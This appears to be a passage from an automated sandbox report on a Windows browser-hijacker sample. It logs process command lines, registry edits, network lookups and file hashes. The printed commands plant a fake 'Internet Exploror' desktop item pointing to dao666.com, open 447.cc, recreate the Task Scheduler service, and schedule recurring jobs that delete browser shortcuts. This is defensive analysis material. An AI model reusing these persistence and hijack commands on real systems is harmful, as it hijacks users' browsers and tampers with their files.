| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?121xia
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?121xia
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\to.cmd
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2744 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\copy.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\run.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
C:\Windows\SysWOW64\at.exe
at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs
| MD5 | 7e46083fb1779c4baf8efe26e6bfbed4 |
| SHA1 | 07155bb6e06e4ddb125a7afd50b5ee67c5c2e1a2 |
| SHA256 | d2b0505bb8eafd88c99de4643d40c9aa5a5a0428a0a30d291fa29657974fadb9 |
| SHA512 | c594c621e954a3b76d9d77a25f4dbd563bacf31450e5afd1ba577f147a4ea6e591c4ba361c0c3c89623a06d6facfb4dd9e1633efff8a41871f21734251a2ffc0 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd
| MD5 | 93283cb2cbb91dc2553d3ccc53c24787 |
| SHA1 | 271054a80b7332910d4f746ccbabd6b9d85915fe |
| SHA256 | 31d5b5b80fc2c292ae1d3d94e6c35b5272e8ad0e9b06aa086eb61d6238d66beb |
| SHA512 | 6b485717301db3a10fde12b378de7e79a018e5e33eef9808c1a414a2b5ba983cc4b32a1bbfa5cd4005085c648381f663eb15c35f1e06c5b3e58bbc6fc6e5b70f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs
| MD5 | e9453c56277dd24802b553677d0620fc |
| SHA1 | 8b27914191feae8061dd9577d473a638173b92a7 |
| SHA256 | 46493b2ba1dbf1f0b360d276423c0e7b7f99cdbe7f23a623d63ce8f20f82ea2d |
| SHA512 | c55a87c18ab67756556943c480385d6a42bb0904b090885b93c151f4661a132c9eb67a9838876af6217636a313a3a817629c2a0fe2a43313fddf1978191d8e41 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd
| MD5 | 5e1ac5999e539cafa3a303e8386cfbf9 |
| SHA1 | dcd5ce7b101636bb35b3c38ea4456f20b5fb142a |
| SHA256 | d9a95138ba749e2c04355d7b9354d90a45941d20fb120af3d2969779d90748d6 |
| SHA512 | f18fe45f0731f4deec3fde3ff19fe1b3d586db3e75e748224adfa0b0ea4b1fabab6b7dfbed3a127cadf2ea9ee6a5a0f9191b50055df39e64a5cce90da50a43a1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd
| MD5 | 22ba26c787caf9c226a57ab934efe3a7 |
| SHA1 | 41da9b24a7e138eadf7fe359a9832bab35a22098 |
| SHA256 | 506c7c101ef39fb59bcef1a4952f0303f979daf01ffe4048e12458ad3cc0181d |
| SHA512 | 75609142b2e50fee2136f27c0dd124b3714f052579ab667fbfaf6f167bd1057b967f34d05293bf4b316b8580a3f63a8903fa147c83821087a4102a66ffb4e941 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd
| MD5 | 1d903a49275ecf0360a005a210710ae1 |
| SHA1 | 53d92ee4cf725fd774fde7d8715dc57f05b4ad5e |
| SHA256 | 5228e97bfb7487be8921377a47ee94aa14ab9fb5208d719fc92cf81350949c6e |
| SHA512 | 0411ec8b3cf03f3587fb9a47b7e587d879fcdfbc6a56e2637a6e5400f4a4fd49c52adc0012c66bde052ed5b5bf96b53340b361cd99c8c2b3a4087d7147362ff4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd
| MD5 | b47fb6ca5604063bb4e0af862ee3be9c |
| SHA1 | ebe74903212c246c83d826fa9ce7789141772b30 |
| SHA256 | fd34806658512394d2f4b9185d32590717b7f2169caad83bea0d93b3564b3044 |
